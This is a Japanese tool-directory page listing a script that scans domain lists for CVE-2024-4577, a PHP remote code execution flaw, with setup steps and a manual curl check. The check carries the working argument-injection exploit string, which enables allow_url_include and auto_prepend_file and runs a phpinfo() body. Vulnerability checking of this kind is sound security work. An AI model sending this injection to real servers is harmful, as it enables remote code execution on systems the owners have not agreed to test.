Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4577 | Kitploit
ツール/GitHubGitHub/graphite-org/cve-2024-4577
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubgraphite-org/cve-2024-4577

CVE-2024-4577

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-4577 脆弱性チェッカー

このスクリプトは、CVE-2024-4577 で説明されている脆弱性をチェックするために設計されています。これは、特定の PHP 設定を悪用してリモートで任意のコードを実行するものです。ドメインリスト内の指定されたエンドポイントに POST リクエストを送信し、レスポンスが脆弱性を示しているかどうかを確認します。

使用方法

  1. GNU Parallel をインストールします:

    root@kitploit:~
    sudo apt-get install parallel
    
  2. リポジトリをクローン: Git を使用して、このリポジトリをローカルマシンにクローンします:

    root@kitploit:~
    git clone https://github.com/Yukiioz/CVE-2024-4577.git
    
  3. リポジトリへ移動: クローンしたディレクトリに移動します:

    root@kitploit:~
    cd CVE-2024-4577
    
  4. ドメインリストを準備: チェックするドメインのリストを含むテキストファイルを作成します。各ドメインは新しい行に配置してください。例:

    root@kitploit:~
    https://example1.com
    https://example2.com
    https://example3.com
    
  5. スクリプトを実行: スクリプト CVE-2024-4577.sh を、ドメインリストファイルのパスを引数として渡して実行します:

    root@kitploit:~
    ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
    
  6. 出力を確認: スクリプトは各ドメインをチェックする際に進行状況を表示します。ドメインが脆弱であると検出された場合、赤色でハイライト表示されます。また、スクリプトは脆弱なドメインのリストを vulnerable_domains.txt というファイルにエクスポートします。

エクスポートされたファイル: vulnerable_domains.txt

スクリプトは、脆弱なドメインのリストを vulnerable_domains.txt というファイルにエクスポートします。このファイルには、脆弱なドメインの単純なリストが含まれており、各ドメインは新しい行に記載されます。手動でさらに確認するには、curl コマンドを使用して、ドメイン上のターゲットエンドポイントに POST リクエストを送信します。https://dev.example.com/test.php をターゲットドメイン上の実際のエンドポイントに置き換えてください。

root@kitploit:~
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
ツールをダウンロード